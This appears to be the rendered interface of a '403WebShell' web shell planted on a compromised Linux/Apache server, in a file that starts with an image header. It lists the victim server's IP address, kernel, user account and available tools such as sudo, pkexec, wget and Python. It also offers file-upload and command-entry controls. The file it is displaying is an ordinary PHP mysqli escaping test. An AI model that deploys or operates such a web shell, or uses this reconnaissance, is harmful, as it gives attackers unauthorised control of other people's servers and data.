????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.55
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/mysqli/tests/mysqli_real_escape_string_nobackslash.phpt
--TEST--
mysqli_real_escape_string() - SQL Mode NO_BACKSLASH_ESCAPE
--SKIPIF--
<?php
require_once('skipif.inc');
require_once('skipifemb.inc');
require_once('skipifconnectfailure.inc');
?>
--FILE--
<?php
	require_once("connect.inc");
	require_once('table.inc');

	if (!mysqli_query($link, 'SET @@sql_mode="NO_BACKSLASH_ESCAPES"'))
		printf("[001] Cannot set NO_BACKSLASH_ESCAPES, [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	if ('\\' !== ($tmp = mysqli_real_escape_string($link, '\\')))
		printf("[002] Expecting \\, got %s\n", $tmp);

	if ('"' !== ($tmp = mysqli_real_escape_string($link, '"')))
		printf("[003] Expecting \", got %s\n", $tmp);

	if ("''" !== ($tmp = mysqli_real_escape_string($link, "'")))
		printf("[004] Expecting '', got %s\n", $tmp);

	if ("\n" !== ($tmp = mysqli_real_escape_string($link, "\n")))
		printf("[005] Expecting \\n, got %s\n", $tmp);

	if ("\r" !== ($tmp = mysqli_real_escape_string($link, "\r")))
		printf("[006] Expecting \\r, got %s\n", $tmp);

	assert("foo" . chr(0) . "bar" === "foo" . chr(0) . "bar");
	if ("foo" . chr(0) . "bar" !== ($tmp = mysqli_real_escape_string($link, "foo" . chr(0) . "bar")))
		printf("[007] Expecting %s, got %s\n", "foo" . chr(0) . "bar", $tmp);

	if (!mysqli_query($link, sprintf('INSERT INTO test(id, label) VALUES (100, "%s")',
			mysqli_real_escape_string($link, "\\"))))
		printf("[009] Cannot INSERT, [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	if (!($res = mysqli_query($link, 'SELECT label FROM test WHERE id = 100')) ||
			!($row = mysqli_fetch_assoc($res)))
		printf("[010] [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	var_dump($row);
	mysqli_free_result($res);

	if (!mysqli_query($link, 'SET @@sql_mode=""'))
		printf("[011] Cannot disable NO_BACKSLASH_ESCAPES, [%d] %s\n", mysqli_errno($link), mysqli_error($link));

	if ('\\\\' !== ($tmp = mysqli_real_escape_string($link, '\\')))
		printf("[012] Expecting \\, got %s\n", $tmp);

	if ("foo\\0bar" !== ($tmp = mysqli_real_escape_string($link, "foo" . chr(0) . "bar")))
		printf("[013] Expecting %s, got %s\n", "foo" . chr(0) . "bar", $tmp);

	mysqli_close($link);

	print "done!";
?>
--EXPECTF--
array(1) {
  [%u|b%"label"]=>
  %unicode|string%(1) "\"
}
done!

Youez - 2016 - github.com/yon3zu
LinuXploit